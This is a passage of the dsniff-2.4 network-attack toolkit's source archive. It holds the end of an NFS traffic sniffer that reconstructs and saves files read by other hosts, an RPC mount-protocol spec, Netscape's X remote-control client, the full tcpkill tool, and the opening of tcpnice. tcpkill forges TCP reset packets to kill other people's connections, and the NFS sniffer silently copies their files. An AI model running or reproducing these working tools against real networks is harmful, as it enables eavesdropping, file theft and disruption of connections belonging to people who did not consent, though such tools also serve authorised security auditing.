((fd = open(ma->filename, O_WRONLY|O_CREAT, 0644)) >= 0) { if (lseek(fd, ma->offset, SEEK_SET) == ma->offset) write(fd, buf, len); } close(fd); } static void nfs2_call(u_int32_t xid, u_int32_t proc, u_char *buf, int len) { XDR xdrs; struct diropargs dargs; struct readargs rargs; struct myreadargs *ma; char *fname; switch (proc) { case NFSPROC_LOOKUP: memset(&dargs, 0, sizeof(dargs)); xdrmem_create(&xdrs, buf, len, XDR_DECODE); if (xdr_diropargs(&xdrs, &dargs)) { if (regex_match(dargs.name)) { xid_map_enter(xid, NFS_PROGRAM, NFS_VERSION, proc, (void *)dargs.name); } } xdr_destroy(&xdrs); break; case NFSPROC_READ: memset(&rargs, 0, sizeof(rargs)); xdrmem_create(&xdrs, buf, len, XDR_DECODE); if (xdr_readargs(&xdrs, &rargs)) { fname = fh_map_find(rargs.file.data, NFS_FHSIZE); if (fname != NULL) { ma = (struct myreadargs *) malloc(sizeof(*ma)); if (ma != NULL) { ma->filename = fname; ma->offset = rargs.offset; xid_map_enter(xid, NFS_PROGRAM, NFS_VERSION, NFSPROC_READ, (void *)ma); } } } xdr_destroy(&xdrs); break; } } static void nfs2_reply(struct xid_map *xm, struct tuple4 *addr, u_char *buf, int len) { XDR xdrs; struct diropres dres; struct readres rres; switch (xm->proc) { case NFSPROC_LOOKUP: xdrmem_create(&xdrs, buf, len, XDR_DECODE); memset(&dres, 0, sizeof(dres)); if (xdr_diropres(&xdrs, &dres)) { if (dres.status == NFS_OK) fh_map_add((char *)xm->data, dres.diropres_u.diropres.file.data, NFS_FHSIZE); } xdr_destroy(&xdrs); break; case NFSPROC_READ: xdrmem_create(&xdrs, buf, len, XDR_DECODE); memset(&rres, 0, sizeof(rres)); if (xdr_readres(&xdrs, &rres)) { if (rres.status == NFS_OK) { nfs_save(addr, (struct myreadargs *)xm->data, rres.readres_u.reply.data.data_val, rres.readres_u.reply.data.data_len); } } xdr_destroy(&xdrs); break; } } static void nfs3_call(u_int32_t xid, u_int32_t proc, u_char *buf, int len) { XDR xdrs; struct LOOKUP3args largs; struct READ3args rargs; struct myreadargs *ma; char *fname; switch (proc) { case NFSPROC3_LOOKUP: memset(&largs, 0, sizeof(largs)); xdrmem_create(&xdrs, buf, len, XDR_DECODE); if (xdr_LOOKUP3args(&xdrs, &largs)) { if (regex_match(largs.what.name)) { xid_map_enter(xid, NFS_PROGRAM, NFS_V3, proc, (void *)largs.what.name); } } xdr_destroy(&xdrs); break; case NFSPROC3_READ: memset(&rargs, 0, sizeof(rargs)); xdrmem_create(&xdrs, buf, len, XDR_DECODE); if (xdr_READ3args(&xdrs, &rargs)) { fname = fh_map_find(rargs.file.data.data_val, rargs.file.data.data_len); if (fname != NULL) { ma = (struct myreadargs *) malloc(sizeof(*ma)); if (ma != NULL) { ma->filename = fname; ma->offset = rargs.offset; xid_map_enter(xid, NFS_PROGRAM, NFS_V3, NFSPROC_READ, (void *)ma); } } } xdr_destroy(&xdrs); break; } } static void nfs3_reply(struct xid_map *xm, struct tuple4 *addr, u_char *buf, int len) { XDR xdrs; struct LOOKUP3res lres; struct READ3res rres; switch (xm->proc) { case NFSPROC3_LOOKUP: xdrmem_create(&xdrs, buf, len, XDR_DECODE); memset(&lres, 0, sizeof(lres)); if (xdr_LOOKUP3res(&xdrs, &lres)) { if (lres.status == NFS3_OK) { fh_map_add((char *)xm->data, lres.LOOKUP3res_u.resok.object.data.data_val, lres.LOOKUP3res_u.resok.object.data.data_len); } } xdr_destroy(&xdrs); break; case NFSPROC3_READ: xdrmem_create(&xdrs, buf, len, XDR_DECODE); memset(&rres, 0, sizeof(rres)); if (xdr_READ3res(&xdrs, &rres)) { if (rres.status == NFS3_OK) { nfs_save(addr, (struct myreadargs *)xm->data, rres.READ3res_u.resok.data.data_val, rres.READ3res_u.resok.data.data_len); } } xdr_destroy(&xdrs); break; } } static void decode_nfs(struct tuple4 *addr, u_char *buf, int len) { struct rpc_msg msg; struct xid_map *xm; int hdrlen; memset(&msg, 0, sizeof(msg)); if ((hdrlen = rpc_decode(buf, len, &msg)) == 0) return; buf += hdrlen; len -= hdrlen; if (msg.rm_direction == CALL && msg.rm_call.cb_prog == NFS_PROGRAM) { if (msg.rm_call.cb_vers == NFS_VERSION) nfs2_call(msg.rm_xid, msg.rm_call.cb_proc, buf, len); else if (msg.rm_call.cb_vers == NFS_V3) nfs3_call(msg.rm_xid, msg.rm_call.cb_proc, buf, len); } else if ((xm = xid_map_find(msg.rm_xid)) != NULL && msg.rm_direction == REPLY && msg.rm_reply.rp_stat == MSG_ACCEPTED && msg.acpted_rply.ar_stat == SUCCESS) { if (xm->vers == NFS_VERSION) nfs2_reply(xm, addr, buf, len); else if (xm->vers == NFS_V3) nfs3_reply(xm, addr, buf, len); free(xm->data); memset(xm, 0, sizeof(*xm)); } } static void decode_udp_nfs(struct libnet_ip_hdr *ip) { static struct tuple4 addr; struct libnet_udp_hdr *udp; u_char *buf; int len, ip_hl = ip->ip_hl * 4; len = ntohs(ip->ip_len) - ip_hl; if (ip->ip_p != IPPROTO_UDP || len < sizeof(*udp)) return; buf = (u_char *)ip + ip_hl; udp = (struct libnet_udp_hdr *)buf; if (ntohs(udp->uh_sport) != 2049 && ntohs(udp->uh_dport) != 2049) return; if (len != ntohs(udp->uh_ulen)) return; buf += sizeof(*udp); len -= sizeof(*udp); addr.saddr = ip->ip_dst.s_addr; addr.daddr = ip->ip_src.s_addr; addr.source = ntohs(udp->uh_dport); addr.dest = ntohs(udp->uh_sport); decode_nfs(&addr, buf, len); } static int decode_tcp_nfs_half(struct tuple4 *addr, struct half_stream *hs) { u_char *p, *buf; int i, len, discard; u_int32_t fraghdr; buf = hs->data; len = hs->count - hs->offset; discard = 0; for (p = buf; p + 4 < buf + len; ) { fraghdr = pntohl(p); p += 4 + FRAGLEN(fraghdr); if (p > buf + len) return (0); if (LASTFRAG(fraghdr)) { i = p - buf; decode_nfs(addr, buf, i); buf += i; len -= i; discard += i; } } return (discard); } static void decode_tcp_nfs(struct tcp_stream *ts, void **darth) { int len = 0; if (ts->addr.dest != 2049 && ts->addr.source != 2049) return; switch (ts->nids_state) { case NIDS_JUST_EST: ts->server.collect = 1; ts->client.collect = 1; break; case NIDS_DATA: if (ts->server.count_new > 0) { len = decode_tcp_nfs_half(&ts->addr, &ts->server); } else if (ts->client.count_new > 0) { len = decode_tcp_nfs_half(&ts->addr, &ts->client); } nids_discard(ts, len); break; default: if (ts->server.count > 0) { decode_tcp_nfs_half(&ts->addr, &ts->server); } else if (ts->client.count > 0) { decode_tcp_nfs_half(&ts->addr, &ts->client); } break; } } static void null_syslog(int type, int errnum, struct ip *iph, void *data) { } int main(int argc, char *argv[]) { extern char *optarg; extern int optind; int c; while ((c = getopt(argc, argv, "i:vh?V")) != -1) { switch (c) { case 'i': nids_params.device = optarg; break; case 'v': Opt_invert = 1; break; default: usage(); } } argc -= optind; argv += optind; if (argc > 0 && strlen(argv[0])) { if ((pregex = (regex_t *) malloc(sizeof(*pregex))) == NULL) err(1, "malloc"); if (regcomp(pregex, argv[0], REG_EXTENDED|REG_NOSUB) != 0) errx(1, "invalid regular expression"); } if (argc > 1) nids_params.pcap_filter = copy_argv(argv + 1); nids_params.scan_num_hosts = 0; nids_params.syslog = null_syslog; fh_map_init(); if (!nids_init()) errx(1, "nids_init: %s", nids_errbuf); nids_register_ip(decode_udp_nfs); nids_register_tcp(decode_tcp_nfs); if (nids_params.pcap_filter != NULL) { warnx("listening on %s [%s]", nids_params.device, nids_params.pcap_filter); } else warnx("listening on %s", nids_params.device); nids_run(); /* NOTREACHED */ exit(0); } dsniff-2.4/mount.x0000600000175000017500000001362507214373565014044 0ustar lucianoluciano/* minimal spec for dsniff's decode_mountd(). */ /* * Copyright (c) 1988,1990,1991,1992 by Sun Microsystems, Inc. */ /* * Protocol description for the mount program */ const MNTPATHLEN = 1024; /* maximum bytes in a pathname argument */ const MNTNAMLEN = 255; /* maximum bytes in a name argument */ const FHSIZE = 32; /* size in bytes of a v2 file handle */ const FHSIZE3 = 64; /* " " " " " v3 " " */ /* * The fhandle is the file handle that the server passes to the client. * All file operations are done using the file handles to refer to a file * or a directory. The file handle can contain whatever information the * server needs to distinguish an individual file. * * Versions 1 and 2 of the protocol share a filehandle of 32 bytes. * * Version 3 supports a 64 byte filehandle that can be used only * with version 3 of the NFS protocol. */ typedef opaque fhandle[FHSIZE]; typedef opaque fhandle3; /* * If a V2 status of zero is returned, the call completed successfully, and * a file handle for the directory follows. A non-zero status indicates * some sort of error. The status corresponds with UNIX error numbers. */ union fhstatus switch (unsigned fhs_status) { case 0: fhandle fhs_fhandle; default: void; }; /* * This #define is added for backwards compatability with applications * which reference the old style fhstatus. The second element of that * structure was called fhs_fh, instead of the current fhs_fhandle. */ % %#define fhs_fh fhstatus_u.fhs_fhandle /* * The following status codes are defined for the V3 mount service: * Note that the precise enum encoding must be followed; the values * are derived from existing implementation practice, and there is * no good reason to disturb them. */ enum mountstat3 { MNT_OK= 0, /* no error */ MNT3ERR_PERM=1, /* Not owner */ MNT3ERR_NOENT=2, /* No such file or directory */ MNT3ERR_IO=5, /* I/O error */ MNT3ERR_ACCES=13, /* Permission denied */ MNT3ERR_NOTDIR=20, /* Not a directory*/ MNT3ERR_INVAL=22, /* Invalid argument.*/ MNT3ERR_NAMETOOLONG=63, /* File name too long */ MNT3ERR_NOTSUPP=10004, /* operation not supported */ MNT3ERR_SERVERFAULT=10006 /* An i/o or similar failure caused */ /* the server to abandon the request */ /* No attributes can be returned. The */ /* client should translate this into EIO */ }; /* * A V3 server returns a file handle and a list of the authentication * flavors that the server will accept for this mount. If the list * is empty, AUTH_UNIX is required. Otherwise, any of the flavors * listed in auth_flavors<> may be used (but no others). * The values of the authentication flavors are defined in the * underlying RPC protocol. */ struct mountres3_ok { fhandle3 fhandle; int auth_flavors<>; }; /* * If a V3 status of MNT_OK is returned, the call completed successfully, and * a file handle for the directory follows. Any other status indicates * some sort of error. */ union mountres3 switch (mountstat3 fhs_status) { case MNT_OK: mountres3_ok mountinfo; default: void; }; /* * The type dirpath is the pathname of a directory */ typedef string dirpath; program MOUNTPROG { /* * Version one of the mount protocol communicates with version two * of the NFS protocol. The only connecting point is the fhandle * structure, which is the same for both protocols. */ version MOUNTVERS { /* * Does no work. It is made available in all RPC services * to allow server reponse testing and timing */ void MOUNTPROC_NULL(void) = 0; /* * If fhs_status is 0, then fhs_fhandle contains the * file handle for the directory. This file handle may * be used in the NFS protocol. This procedure also adds * a new entry to the mount list for this client mounting * the directory. * Unix authentication required. */ fhstatus MOUNTPROC_MNT(dirpath) = 1; } = 1; /* * Version two of the mount protocol communicates with version two * of the NFS protocol. It is identical to version one except for a * new procedure call for posix. */ version MOUNTVERS_POSIX { /* * Does no work. It is made available in all RPC services * to allow server reponse testing and timing */ void MOUNTPROC_NULL(void) = 0; /* * If fhs_status is 0, then fhs_fhandle contains the * file handle for the directory. This file handle may * be used in the NFS protocol. This procedure also adds * a new entry to the mount list for this client mounting * the directory. * Unix authentication required. */ fhstatus MOUNTPROC_MNT(dirpath) = 1; } = 2; /* * Version 3 of the mount protocol communicates with version 3 * of the NFS protocol. The only connecting point is the nfs_fh3 * structure, which is the same for both protocols. * * The only significant change over version 2 is that MOUNTPROC_MNT * returns a longer filehandle (64 bytes instead of 32) as well * as authentication information. MOUNTPROC_PATHCONF is subsumed * into V3 of the NFS protocol and MOUNTPROC_EXPORTALL is eliminated. */ version MOUNTVERS3 { /* * Does no work. It is made available in all RPC services * to allow server reponse testing and timing */ void MOUNTPROC_NULL(void) = 0; /* * Mount a file system. * * If mountres.fhs_status is NFS_OK, then mountres.mountinfo * contains the file handle for the directory and * a list of acceptable authentication flavors. This file * handle may only be used in version 3 of the NFS protocol. * This procedure also results in the server adding a new * entry to its mount list recording that this client has * mounted the directory. Unix authentication or better * is required. */ mountres3 MOUNTPROC_MNT(dirpath) = 1; } = 3; } = 100005; dsniff-2.4/remote.c0000600000175000017500000004424207204257550014141 0ustar lucianoluciano/* -*- Mode:C; tab-width: 8 -*- * remote.c --- remote control of Netscape Navigator for Unix. * version 1.1.3, for Netscape Navigator 1.1 and newer. * * Copyright © 1996 Netscape Communications Corporation, all rights reserved. * Created: Jamie Zawinski , 24-Dec-94. * * Permission to use, copy, modify, distribute, and sell this software and its * documentation for any purpose is hereby granted without fee, provided that * the above copyright notice appear in all copies and that both that * copyright notice and this permission notice appear in supporting * documentation. No representations are made about the suitability of this * software for any purpose. It is provided "as is" without express or * implied warranty. * * To compile: * * cc -o netscape-remote remote.c -DSTANDALONE -lXmu -lX11 * * To use: * * netscape-remote -help * * Documentation for the protocol which this code implements may be found at: * * http://home.netscape.com/newsref/std/x-remote.html * * Bugs and commentary to x_cbug@netscape.com. */ #include #include #include #include #include #include #include /* for XmuClientWindow() */ /* vroot.h is a header file which lets a client get along with `virtual root' window managers like swm, tvtwm, olvwm, etc. If you don't have this header file, you can find it at "http://home.netscape.com/newsref/std/vroot.h". If you don't care about supporting virtual root window managers, you can comment this line out. */ #include "vroot.h" #ifdef STANDALONE static const char *progname = 0; static const char *expected_mozilla_version = "1.1"; #else /* !STANDALONE */ extern const char *progname; extern const char *expected_mozilla_version; #endif /* !STANDALONE */ #define MOZILLA_VERSION_PROP "_MOZILLA_VERSION" #define MOZILLA_LOCK_PROP "_MOZILLA_LOCK" #define MOZILLA_COMMAND_PROP "_MOZILLA_COMMAND" #define MOZILLA_RESPONSE_PROP "_MOZILLA_RESPONSE" static Atom XA_MOZILLA_VERSION = 0; static Atom XA_MOZILLA_LOCK = 0; static Atom XA_MOZILLA_COMMAND = 0; static Atom XA_MOZILLA_RESPONSE = 0; static void mozilla_remote_init_atoms (Display *dpy) { if (! XA_MOZILLA_VERSION) XA_MOZILLA_VERSION = XInternAtom (dpy, MOZILLA_VERSION_PROP, False); if (! XA_MOZILLA_LOCK) XA_MOZILLA_LOCK = XInternAtom (dpy, MOZILLA_LOCK_PROP, False); if (! XA_MOZILLA_COMMAND) XA_MOZILLA_COMMAND = XInternAtom (dpy, MOZILLA_COMMAND_PROP, False); if (! XA_MOZILLA_RESPONSE) XA_MOZILLA_RESPONSE = XInternAtom (dpy, MOZILLA_RESPONSE_PROP, False); } static Window mozilla_remote_find_window (Display *dpy) { int i; Window root = RootWindowOfScreen (DefaultScreenOfDisplay (dpy)); Window root2, parent, *kids; unsigned int nkids; Window result = 0; Window tenative = 0; unsigned char *tenative_version = 0; if (! XQueryTree (dpy, root, &root2, &parent, &kids, &nkids)) { fprintf (stderr, "%s: XQueryTree failed on display %s\n", progname, DisplayString (dpy)); exit (2); } /* root != root2 is possible with virtual root WMs. */ if (! (kids && nkids)) { fprintf (stderr, "%s: root window has no children on display %s\n", progname, DisplayString (dpy)); exit (2); } for (i = nkids-1; i >= 0; i--) { Atom type; int format, status; unsigned long nitems, bytesafter; unsigned char *version = 0; Window w; w = XmuClientWindow (dpy, kids[i]); status = XGetWindowProperty (dpy, w, XA_MOZILLA_VERSION, 0, (65536 / sizeof (long)), False, XA_STRING, &type, &format, &nitems, &bytesafter, &version); if (! version) continue; if (strcmp ((char *) version, expected_mozilla_version) && !tenative) { tenative = w; tenative_version = version; continue; } XFree (version); if (status == Success && type != None) { result = w; break; } } if (result && tenative) { fprintf (stderr, "%s: warning: both version %s (0x%x) and version\n" "\t%s (0x%x) are running. Using version %s.\n", progname, tenative_version, (unsigned int) tenative, expected_mozilla_version, (unsigned int) result, expected_mozilla_version); XFree (tenative_version); return result; } else if (tenative) { #if 0 fprintf (stderr, "%s: warning: expected version %s but found version\n" "\t%s (0x%x) instead.\n", progname, expected_mozilla_version, tenative_version, (unsigned int) tenative); #endif XFree (tenative_version); return tenative; } else if (result) { return result; } else { fprintf (stderr, "%s: not running on display %s\n", progname, DisplayString (dpy)); exit (1); } } static void mozilla_remote_check_window (Display *dpy, Window window) { Atom type; int format; unsigned long nitems, bytesafter; unsigned char *version = 0; int status = XGetWindowProperty (dpy, window, XA_MOZILLA_VERSION, 0, (65536 / sizeof (long)), False, XA_STRING, &type, &format, &nitems, &bytesafter, &version); if (status != Success || !version) { fprintf (stderr, "%s: window 0x%x is not a Netscape window.\n", progname, (unsigned int) window); exit (6); } else if (strcmp ((char *) version, expected_mozilla_version)) { fprintf (stderr, "%s: warning: window 0x%x is Netscape version %s;\n" "\texpected version %s.\n", progname, (unsigned int) window, version, expected_mozilla_version); } XFree (version); } static char *lock_data = 0; static void mozilla_remote_obtain_lock (Display *dpy, Window window) { Bool locked = False; Bool waited = False; if (! lock_data) { lock_data = (char *) malloc (255); sprintf (lock_data, "pid%d@", getpid ()); if (gethostname (lock_data + strlen (lock_data), 100)) { perror ("gethostname"); exit (-1); } } do { int result; Atom actual_type; int actual_format; unsigned long nitems, bytes_after; unsigned char *data = 0; XGrabServer (dpy); /* ################################# DANGER! */ result = XGetWindowProperty (dpy, window, XA_MOZILLA_LOCK, 0, (65536 / sizeof (long)), False, /* don't delete */ XA_STRING, &actual_type, &actual_format, &nitems, &bytes_after, &data); if (result != Success || actual_type == None) { /* It's not now locked - lock it. */ #ifdef DEBUG_PROPS fprintf (stderr, "%s: (writing " MOZILLA_LOCK_PROP " \"%s\" to 0x%x)\n", progname, lock_data, (unsigned int) window); #endif XChangeProperty (dpy, window, XA_MOZILLA_LOCK, XA_STRING, 8, PropModeReplace, (unsigned char *) lock_data, strlen (lock_data)); locked = True; } XUngrabServer (dpy); /* ################################# danger over */ XSync (dpy, False); if (! locked) { /* We tried to grab the lock this time, and failed because someone else is holding it already. So, wait for a PropertyDelete event to come in, and try again. */ fprintf (stderr, "%s: window 0x%x is locked by %s; waiting...\n", progname, (unsigned int) window, data); waited = True; while (1) { XEvent event; XNextEvent (dpy, &event); if (event.xany.type == DestroyNotify && event.xdestroywindow.window == window) { fprintf (stderr, "%s: window 0x%x unexpectedly destroyed.\n", progname, (unsigned int) window); exit (6); } else if (event.xany.type == PropertyNotify && event.xproperty.state == PropertyDelete && event.xproperty.window == window && event.xproperty.atom == XA_MOZILLA_LOCK) { /* Ok! Someone deleted their lock, so now we can try again. */ #ifdef DEBUG_PROPS fprintf (stderr, "%s: (0x%x unlocked, trying again...)\n", progname, (unsigned int) window); #endif break; } } } if (data) XFree (data); } while (! locked); if (waited) fprintf (stderr, "%s: obtained lock.\n", progname); } static void mozilla_remote_free_lock (Display *dpy, Window window) { int result; Atom actual_type; int actual_format; unsigned long nitems, bytes_after; unsigned char *data = 0; #ifdef DEBUG_PROPS fprintf (stderr, "%s: (deleting " MOZILLA_LOCK_PROP " \"%s\" from 0x%x)\n", progname, lock_data, (unsigned int) window); #endif result = XGetWindowProperty (dpy, window, XA_MOZILLA_LOCK, 0, (65536 / sizeof (long)), True, /* atomic delete after */ XA_STRING, &actual_type, &actual_format, &nitems, &bytes_after, &data); if (result != Success) { fprintf (stderr, "%s: unable to read and delete " MOZILLA_LOCK_PROP " property\n", progname); return; } else if (!data || !*data) { fprintf (stderr, "%s: invalid data on " MOZILLA_LOCK_PROP " of window 0x%x.\n", progname, (unsigned int) window); return; } else if (strcmp ((char *) data, lock_data)) { fprintf (stderr, "%s: " MOZILLA_LOCK_PROP " was stolen! Expected \"%s\", saw \"%s\"!\n", progname, lock_data, data); return; } if (data) XFree (data); } static int mozilla_remote_command (Display *dpy, Window window, const char *command, Bool raise_p) { int result = 0; Bool done = False; char *new_command = 0; /* The -noraise option is implemented by passing a "noraise" argument to each command to which it should apply. */ if (! raise_p) { char *close; new_command = (char *) malloc (strlen (command) + 20); strcpy (new_command, command); close = strrchr (new_command, ')'); if (close) strcpy (close, ", noraise)"); else strcat (new_command, "(noraise)"); command = new_command; } #ifdef DEBUG_PROPS fprintf (stderr, "%s: (writing " MOZILLA_COMMAND_PROP " \"%s\" to 0x%x)\n", progname, command, (unsigned int) window); #endif XChangeProperty (dpy, window, XA_MOZILLA_COMMAND, XA_STRING, 8, PropModeReplace, (unsigned char *) command, strlen (command)); while (!done) { XEvent event; XNextEvent (dpy, &event); if (event.xany.type == DestroyNotify && event.xdestroywindow.window == window) { /* Print to warn user...*/ fprintf (stderr, "%s: window 0x%x was destroyed.\n", progname, (unsigned int) window); result = 6; goto DONE; } else if (event.xany.type == PropertyNotify && event.xproperty.state == PropertyNewValue && event.xproperty.window == window && event.xproperty.atom == XA_MOZILLA_RESPONSE) { Atom actual_type; int actual_format; unsigned long nitems, bytes_after; unsigned char *data = 0; result = XGetWindowProperty (dpy, window, XA_MOZILLA_RESPONSE, 0, (65536 / sizeof (long)), True, /* atomic delete after */ XA_STRING, &actual_type, &actual_format, &nitems, &bytes_after, &data); #ifdef DEBUG_PROPS if (result == Success && data && *data) { fprintf (stderr, "%s: (server sent " MOZILLA_RESPONSE_PROP " \"%s\" to 0x%x.)\n", progname, data, (unsigned int) window); } #endif if (result != Success) { fprintf (stderr, "%s: failed reading " MOZILLA_RESPONSE_PROP " from window 0x%0x.\n", progname, (unsigned int) window); result = 6; done = True; } else if (!data || strlen((char *) data) < 5) { fprintf (stderr, "%s: invalid data on " MOZILLA_RESPONSE_PROP " property of window 0x%0x.\n", progname, (unsigned int) window); result = 6; done = True; } else if (*data == '1') /* positive preliminary reply */ { fprintf (stderr, "%s: %s\n", progname, data + 4); /* keep going */ done = False; } #if 1 else if (!strncmp ((char *)data, "200", 3)) /* positive completion */ { result = 0; done = True; } #endif else if (*data == '2') /* positive completion */ { fprintf (stderr, "%s: %s\n", progname, data + 4); result = 0; done = True; } else if (*data == '3') /* positive intermediate reply */ { fprintf (stderr, "%s: internal error: " "server wants more information? (%s)\n", progname, data); result = 3; done = True; } else if (*data == '4' || /* transient negative completion */ *data == '5') /* permanent negative completion */ { fprintf (stderr, "%s: %s\n", progname, data + 4); result = (*data - '0'); done = True; } else { fprintf (stderr, "%s: unrecognised " MOZILLA_RESPONSE_PROP " from window 0x%x: %s\n", progname, (unsigned int) window, data); result = 6; done = True; } if (data) XFree (data); } #ifdef DEBUG_PROPS else if (event.xany.type == PropertyNotify && event.xproperty.window == window && event.xproperty.state == PropertyDelete && event.xproperty.atom == XA_MOZILLA_COMMAND) { fprintf (stderr, "%s: (server 0x%x has accepted " MOZILLA_COMMAND_PROP ".)\n", progname, (unsigned int) window); } #endif /* DEBUG_PROPS */ } DONE: if (new_command) free (new_command); return result; } int mozilla_remote_commands (Display *dpy, Window window, char **commands) { Bool raise_p = True; int status = 0; mozilla_remote_init_atoms (dpy); if (window == 0) window = mozilla_remote_find_window (dpy); else mozilla_remote_check_window (dpy, window); XSelectInput (dpy, window, (PropertyChangeMask|StructureNotifyMask)); mozilla_remote_obtain_lock (dpy, window); while (*commands) { if (!strcmp (*commands, "-raise")) raise_p = True; else if (!strcmp (*commands, "-noraise")) raise_p = False; else status = mozilla_remote_command (dpy, window, *commands, raise_p); if (status != 0) break; commands++; } /* When status = 6, it means the window has been destroyed */ /* It is invalid to free the lock when window is destroyed. */ if ( status != 6 ) mozilla_remote_free_lock (dpy, window); return status; } #ifdef STANDALONE static void usage (void) { fprintf (stderr, "usage: %s [ options ... ]\n\ where options include:\n\ \n\ -help to show this message.\n\ -display to specify the X server to use.\n\ -remote to execute a command in an already-running\n\ Netscape process. See the manual for a\n\ list of valid commands.\n\ -id the id of an X window to which the -remote\n\ commands should be sent; if unspecified,\n\ the first window found will be used.\n\ -raise whether following -remote commands should\n\ cause the window to raise itself to the top\n\ (this is the default.)\n\ -noraise the opposite of -raise: following -remote\n\ commands will not auto-raise the window.\n\ ", progname); } void main (int argc, char **argv) { Display *dpy; char *dpy_string = 0; char **remote_commands = 0; int remote_command_count = 0; int remote_command_size = 0; unsigned long remote_window = 0; Bool sync_p = False; int i; progname = strrchr (argv[0], '/'); if (progname) progname++; else progname = argv[0]; /* Hack the -help and -version arguments before opening the display. */ for (i = 1; i < argc; i++) { if (!strcasecmp (argv [i], "-h") || !strcasecmp (argv [i], "-help")) { usage (); exit (0); } else if (!strcmp (argv [i], "-d") || !strcmp (argv [i], "-dpy") || !strcmp (argv [i], "-disp") || !strcmp (argv [i], "-display")) { i++; dpy_string = argv [i]; } else if (!strcmp (argv [i], "-sync") || !strcmp (argv [i], "-synchronize")) { sync_p = True; } else if (!strcmp (argv [i], "-remote")) { if (remote_command_count == remote_command_size) { remote_command_size += 20; remote_commands = (remote_commands ? realloc (remote_commands, remote_command_size * sizeof (char *)) : calloc (remote_command_size, sizeof (char *))); } i++; if (!argv[i] || *argv[i] == '-' || *argv[i] == 0) { fprintf (stderr, "%s: invalid `-remote' option \"%s\"\n", progname, argv[i] ? argv[i] : ""); usage (); exit (-1); } remote_commands [remote_command_count++] = argv[i]; } else if (!strcmp (argv [i], "-raise") || !strcmp (argv [i], "-noraise")) { char *r = argv [i]; if (remote_command_count == remote_command_size) { remote_command_size += 20; remote_commands = (remote_commands ? realloc (remote_commands, remote_command_size * sizeof (char *)) : calloc (remote_command_size, sizeof (char *))); } remote_commands [remote_command_count++] = r; } else if (!strcmp (argv [i], "-id")) { char c; if (remote_command_count > 0) { fprintf (stderr, "%s: the `-id' option must preceed all `-remote' options.\n", progname); usage (); exit (-1); } else if (remote_window != 0) { fprintf (stderr, "%s: only one `-id' option may be used.\n", progname); usage (); exit (-1); } i++; if (argv[i] && 1 == sscanf (argv[i], " %ld %c", &remote_window, &c)) ; else if (argv[i] && 1 == sscanf (argv[i], " 0x%lx %c", &remote_window, &c)) ; else { fprintf (stderr, "%s: invalid `-id' option \"%s\"\n", progname, argv[i] ? argv[i] : ""); usage (); exit (-1); } } } dpy = XOpenDisplay (dpy_string); if (! dpy) exit (-1); if (sync_p) XSynchronize (dpy, True); exit (mozilla_remote_commands (dpy, (Window) remote_window, remote_commands)); } #endif /* STANDALONE */ dsniff-2.4/tcpkill.c0000600000175000017500000000620307254616003014300 0ustar lucianoluciano/* * tcpkill.c * * Kill TCP connections already in progress. * * Copyright (c) 2000 Dug Song * * $Id: tcpkill.c,v 1.17 2001/03/17 08:10:43 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include "pcaputil.h" #include "version.h" #define DEFAULT_SEVERITY 3 int Opt_severity = DEFAULT_SEVERITY; int pcap_off; static void usage(void) { fprintf(stderr, "Version: " VERSION "\n" "Usage: tcpkill [-i interface] [-1..9] expression\n"); exit(1); } static void tcp_kill_cb(u_char *user, const struct pcap_pkthdr *pcap, const u_char *pkt) { struct libnet_ip_hdr *ip; struct libnet_tcp_hdr *tcp; u_char ctext[64], buf[IP_H + TCP_H]; u_int32_t seq, win; int i, *sock, len; sock = (int *)user; pkt += pcap_off; len = pcap->caplen - pcap_off; ip = (struct libnet_ip_hdr *)pkt; if (ip->ip_p != IPPROTO_TCP) return; tcp = (struct libnet_tcp_hdr *)(pkt + (ip->ip_hl << 2)); if (tcp->th_flags & (TH_SYN|TH_FIN|TH_RST)) return; libnet_build_ip(TCP_H, 0, 0, 0, 64, IPPROTO_TCP, ip->ip_dst.s_addr, ip->ip_src.s_addr, NULL, 0, buf); libnet_build_tcp(ntohs(tcp->th_dport), ntohs(tcp->th_sport), 0, 0, TH_RST, 0, 0, NULL, 0, buf + IP_H); seq = ntohl(tcp->th_ack); win = ntohs(tcp->th_win); snprintf(ctext, sizeof(ctext), "%s:%d > %s:%d:", libnet_host_lookup(ip->ip_src.s_addr, 0), ntohs(tcp->th_sport), libnet_host_lookup(ip->ip_dst.s_addr, 0), ntohs(tcp->th_dport)); ip = (struct libnet_ip_hdr *)buf; tcp = (struct libnet_tcp_hdr *)(ip + 1); for (i = 0; i < Opt_severity; i++) { ip->ip_id = libnet_get_prand(PRu16); seq += (i * win); tcp->th_seq = htonl(seq); libnet_do_checksum(buf, IPPROTO_TCP, TCP_H); if (libnet_write_ip(*sock, buf, sizeof(buf)) < 0) warn("write_ip"); fprintf(stderr, "%s R %lu:%lu(0) win 0\n", ctext, seq, seq); } } int main(int argc, char *argv[]) { extern char *optarg; extern int optind; int c, sock; char *p, *intf, *filter, ebuf[PCAP_ERRBUF_SIZE]; pcap_t *pd; intf = NULL; while ((c = getopt(argc, argv, "i:123456789h?V")) != -1) { switch (c) { case 'i': intf = optarg; break; case '0': case '1': case '2': case '3': case '4': case '5': case '6': case '7': case '8': case '9': p = argv[optind - 1]; if (p[0] == '-' && p[1] == c && p[2] == '\0') Opt_severity = atoi(++p); else Opt_severity = atoi(argv[optind] + 1); break; default: usage(); break; } } if (intf == NULL && (intf = pcap_lookupdev(ebuf)) == NULL) errx(1, "%s", ebuf); argc -= optind; argv += optind; if (argc == 0) usage(); filter = copy_argv(argv); if ((pd = pcap_init(intf, filter, 64)) == NULL) errx(1, "couldn't initialize sniffing"); if ((pcap_off = pcap_dloff(pd)) < 0) errx(1, "couldn't determine link layer offset"); if ((sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1) errx(1, "couldn't initialize sending"); libnet_seed_prand(); warnx("listening on %s [%s]", intf, filter); pcap_loop(pd, -1, tcp_kill_cb, (u_char *)&sock); /* NOTREACHED */ exit(0); } dsniff-2.4/tcpnice.c0000600000175000017500000001150607254612477014300 0ustar lucianoluciano/* * tcpnice.c * * Slow down TCP connections already in progress. * * Copyright (c) 2000 Dug Song * * $Id: tcpnice.c,v 1.17 2001/03/17 07:41:51 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include "pcaputil.h" #include "version.h" #define MIN_WIN 1 /* XXX */ #define MIN_MTU 68 /* RFC 1191 */ static int Opt_icmp; static int Opt_pmtu; static int Opt_win; static int pcap_off; static u_char buf[BUFSIZ]; static void usage(void) { fprintf(stderr, "Version: " VERSION "\n" "Usage: tcpnice [-A] [-I] [-M] [-i interface] expression\n"); exit(1); } static void 